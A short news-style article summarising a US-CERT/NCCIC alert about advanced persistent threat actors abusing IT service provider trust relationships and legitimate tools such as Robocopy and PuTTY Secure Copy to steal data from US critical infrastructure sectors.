Advanced persistent threats (APTs) are targeting IT Service Provider Customers for cyber espionage and intellectual property theft against US critical infrastructure sectors
Advanced persistent threat (APT) actors actively exploiting trust relationships in information technology (IT) service provider networks around the world. It has been denounced by the National Cyber security and Communications Integration Center (NCCIC). APTs have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing. These techniques include using legitimate credentials and trusted off-the-shelf applications and pre-installed system tools present in MSP customer networks. Pre-installed system tools, such as command line scripts, are very common and used by system administrators for legitimate processes. These scripts often cannot be blocked because they are legitimate tools, so APT actors can use them and remain undetected on victim networks.
APTs for their cyber warfare operations are using tools like Robocopy and PuTTY Secure Copy Client functions
APTs have been observed using Robocopy—a Microsoft command line tool—to transfer exfiltrated and archived data from MSP client networks back through MSP network environments. Additionally, APT actors have been observed using legitimate PuTTY Secure Copy Client functions, allowing them to transfer stolen data securely and directly to third-party systems. A successful network intrusion can have severe impacts to the affected organization, particularly if the compromise becomes public. Possible impacts include temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses to restore systems and files, and potential harm to the organization’s reputation. To counter the malicious actors, the US-CERT published some suggestion for the best respinse and mitigation of their cyber attacks.